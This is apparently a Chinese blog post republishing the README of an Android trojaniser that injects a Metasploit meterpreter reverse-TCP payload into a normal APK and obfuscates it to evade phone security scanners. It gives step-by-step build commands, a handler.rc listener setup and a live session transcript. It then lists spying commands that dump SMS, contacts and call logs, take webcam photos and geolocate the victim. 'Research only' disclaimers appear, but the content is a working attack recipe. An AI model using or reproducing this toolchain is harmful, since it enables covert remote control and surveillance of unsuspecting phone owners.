介绍

由于经典的MSF生成apk安装包控制,版本较低,高版本安卓手机可能会出现版本不支持或无法使用的现象,而且apk无法正常使用,没有图形化界面,比较假。

  • 相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。

  • 注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。

项目地址

  • 将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。

  • 项目地址: GitHub - ba0gu0/520apkhook: 把msf生成的安卓远控附加进普通的app中,并进行加固隐藏特征。可以绕过常见的手机安全管家。

  • 作者: BaoGuo

重点说明

  • 项目目前由于加固脚本问题, 目前只支持单classes.dex文件操作.

  • 本项目仅用于安全研究, 禁止利用脚本进行攻击, 使用本脚本产生的一切问题和本人无关.

  • 部分被加固过的app无法进行注入,已测试网易系列,360系列,腾讯系列,其他的请自行测试。

项目依赖

  • 本项目参考以下项目

  • Java层DEX一键加固脚本

  • APK Infector

使用

  1. 使用Linux或者macos主机, 安装python3, openjdk8, metasploit-framework.
  2. 使用python3生成apk文件, 需要指定msf远控链接的IP和端口.

cd 520apkhook
python3 hook.py --lhost 192.168.?.? --lport 1433 -n ./base.apk// --host 指定msf远控的IP
// --lport 指定msf远控端口
// -n 指定被注入的apk文件路径

生成需要指定的msf payload类型

python3 hook.py --lhost 192.168.?.? --lport 1433 -n ./base.apk[*] 创建随机字符串,用来修改msf payload!
[+] 生成成功![*] 检查电脑上的开发环境
================================[:] NOTE : 请确认安装jdk8环境![*] 检查 : Jdk版本
javac 1.8.0_282
[+] JDK - OK[*] 检查 : msfvenom
[+] msfvenom - OK====================================[*] Available Types of Payload====================================(1) android/meterpreter/reverse_tcp(2) android/meterpreter/reverse_http(3) android/meterpreter/reverse_https[?] 选择msf payload (1/2/3): 1
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10192 bytes
......

apk签名时需要输入证书的相关信息

......
[*] 将加固后的dex文件替换apk中的class dex!
'classes.dex'...
[+] 插入成功 !
[+] app加固完成[*] 创建app签名文件!
您的名字与姓氏是什么?[Unknown]:  123456
您的组织单位名称是什么?[Unknown]:  123456
您的组织名称是什么?[Unknown]:  123456
您所在的城市或区域名称是什么?[Unknown]:  123456
您所在的省/市/自治区名称是什么?[Unknown]:  123456
该单位的双字母国家/地区代码是什么?[Unknown]:  123456
CN=123456, OU=123456, O=123456, L=123456, ST=123456, C=123456是否正确?[否]:  y
......

在生成apk文件后, 目录下会产生Final_Infected.apkhandler.rc

lsFinal_Infected.apk base.apk           hook.py            libs
Readme.md          handler.rc         images

使用msfconsole加载handler.rc进行服务端监听

msfconsole -r handler.rc# cowsay++
____________
< metasploit >
------------\   ,__,\  (oo)____(__)    )\||--|| *=[ metasploit v6.0.42-dev-b177452c898ad956be8540a40c805bf52310c234]
+ -- --=[ 2124 exploits - 1137 auxiliary - 361 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services[*] Processing handler.rc for ERB directives.
resource (handler.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (handler.rc)> set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
resource (handler.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (handler.rc)> set LPORT 1433
LPORT => 1433
resource (handler.rc)> set exitonsession false
exitonsession => false
resource (handler.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 0.0.0.0:1433
msf6 exploit(multi/handler) >
......

将生成的apk文件在安卓手机进行安装, 即可完成对目标的控制

成功后,可以在msf中进行远程控制

msf6 exploit(multi/handler) > sessionsActive sessions
===============Id  Name  Type                        Information         Connection--  ----  ----                        -----------         ----------1         meterpreter dalvik/android  u0_a53 @ localhost  192.168.0.21:1433 -> 192.168.0.68:65133 (192.168.164.194)msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...meterpreter > sysinfo
Computer    : localhost
OS          : Android 11 - Linux 5.4.61-********+ (armv81)
Meterpreter : dalvik/android
meterpreter > ls
No entries exist in /data/user/0/com.zhangy.vphone/files
meterpreter > app_list
Application List
================Name                                Package                               Running  IsSystem----                                -------                               -------  --------Android System WebView              com.android.webview                   false    trueAndroid 系统                          android                               false    trueAndroid动态壁纸                         com.android.wallpaper                 false    trueArm Pro                             armadillo.studio                      false    falseBlack Hole                          com.android.galaxy4                   false    trueBluetooth MIDI Service              com.android.bluetoothmidiservice      false    trueCall Log Backup/Restore             com.android.calllogbackup             false    trueCaptivePortalLogin                  com.android.captiveportallogin        false    trueHTML 查看程序                           com.android.htmlviewer                false    trueIntent Filter Verification Service  com.android.statementservice          false    trueKK谷歌助手                              io.kkzs                               false    trueLOL GG                              com.hpdjyxsziq.sqmezcbpyf             false    falseLive Wallpaper Picker               com.android.wallpaper.livepicker      false    trueMT管理器                               bin.mt.plus                           false    false......

一些MSF的常见利用命令

seessions 查看已经获取的会话

sysinfo 查看目标系统信息

screenshot 屏幕截图

webcam_list 查看相机列表

webcam_stream 开启摄像头

webcam_snap 拍照

dump_calllog 获取电话

dump_contacts 获取通讯录

dump_sms 获取短信

geolocate 获取位置

注意:仅供学习测试,不得用于非法或者商业目的,否则后果自负,所有权及解释权归本人所有。

注意:仅供学习测试,不得用于非法或者商业目的,否则后果自负,所有权及解释权归本人所有。

注意:仅供学习测试,不得用于非法或者商业目的,否则后果自负,所有权及解释权归本人所有。

利用MSF打包加固APK对安卓手机进行控制相关推荐

  1. 毕业论文 | 基于安卓手机蓝牙控制的智能小车设计(源代码)

    博主github:https://github.com/MichaelBeechan 博主CSDN:https://blog.csdn.net/u011344545 预告:源代码.论文.电路图设计链接 ...

  2. android智能小车 论文,基于安卓手机蓝牙控制的智能小车设计毕业设计(论文).doc...

    编 号: 审定成绩: 毕业设计(论文) 设计(论文)题目: 学院:学 生 姓 名 :专 业 :班 级 :学 号 :指 导 教 师 :答辩组 负责人 : 填表时间:年月 摘 要 随着物联网的兴起,And ...

  3. android手机后台流量,安卓手机如何控制流量

    安卓手机如何控制流量 我们都知道现在的智能手机消耗流量很大.那么安卓手机如何控制流量呢?下面就让jy135小编来告诉大家吧,欢迎阅读. 1.掌握发放图片的原则--图片占用的流量比较大,一般情况下不要随 ...

  4. 小米电视、iphone手机、安卓手机等控制浏览器默认缩放大小的方法

    小米电视.iphone手机.安卓手机等控制浏览器默认缩放大小的方法 小米电视2S,安装了一个猎豹浏览器,电视的默认分辨率是1920*1080,外接输入的话可以达到4K,但在显示网页的时候,全屏的最大分 ...

  5. Iphone手机、安卓手机浏览器控制默认缩放大小的方法总结(附代码)

    可能大家发现自己制作的手机端页面,默认打开的时候并不是在理想的缩放状态下. 遇到这样的问题,需要在head标签下,添加meta解决. 代码如下: ? 1 2 3 4 5 6 7 8 9 10 11 1 ...

  6. Unity 打包成APK部分安卓机黑屏

    近期才发现的问题,打包的Unity版本是2017.4.30 开发AR程序发布安卓测试的时候拿同事的华为手机发现出现了黑屏的情况,但是摄像头功能还是存在的,就是黑屏去把摄像头对准扫描图依然会触发识图后的 ...

  7. uniapp 打包之后,部分安卓手机不能安装提示“解析软件包时出现问题”

    原因 基本上这个问题都是在minSdkVersion要求版本太高 相关文档:https://ask.dcloud.net.cn/article/193 操作 manifest.json > AP ...

  8. Mac 如何安装apk到安卓手机

    1.安装android studio后 确认adb目录,一般目录在 /Library/Android/sdk/platform-tools,代表当前用户的根目录 command+shift+G 到这个 ...

  9. 利用游戏软件注入漏洞渗透安卓手机

    实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) Evil-Droid工具 3D摩托安装包 实验步骤: 1.禁用IPV6 echo " ...

最新文章

  1. 转:45 Useful JavaScript Tips, Tricks and Best Practices
  2. revit导出lumion插件_建筑工程BIM建模入门级教程——REVIT的几种渲染方式
  3. 为什么二级菜单会被挡住_武夷红茶为什么是二级茶?我们平时喝的红茶会不会被加了糖?...
  4. 一文搞定哈希(六种构建、四种冲突解决方法、查找算法总结)
  5. mac电脑开机键盘和鼠标失灵
  6. 字典的增删改查/元组的创建
  7. java 贪吃蛇 控制台_控制台游戏贪吃蛇Java版
  8. 微服务之间最佳调用方式是什么?
  9. LINUX C#开发教程
  10. 为eclipse3.6安装subversive插件
  11. 怎样用java抽签小程序,可以作弊的抽签小程序,急求java抽签小程序
  12. 诺顿企业版安装找不到路径
  13. 学生信息管理系统(C++实现)
  14. QUIC协议是如何做到0RTT加密传输的(addons)
  15. oracle服务名XDB_Oracle XDB和XPT
  16. 相机标定中的四个坐标系
  17. Local package.json exists, but node_modules missing, did you mean to install?
  18. 设计一个简单的基于三层交换技术的校园网络——计算机网络课程设计
  19. 个人记录002--IAP程序做跳转的时候检查栈顶地址问题,(ck_addr0x2FFE0000)==0x20000000
  20. 2021最新支持APP|公众号聊天在线客服程序源码

热门文章

  1. BackTrack 5 tools
  2. Freemarker源码分析(9)core.JSONParser类
  3. 基于RTSP视频流的Java后台服务端虹软人脸识别
  4. HTML5+CSS3小实例:简约不简单的社交分享按钮
  5. jQuery-file-upload插件的使用(小实例)
  6. PHP学习笔记:环境变量
  7. 轻博客系统 doudangQb
  8. cs231n-(4)反向传播
  9. MeasureSpec源码解读
  10. python参数估计_最小二乘与最大似然参数估计及Python实现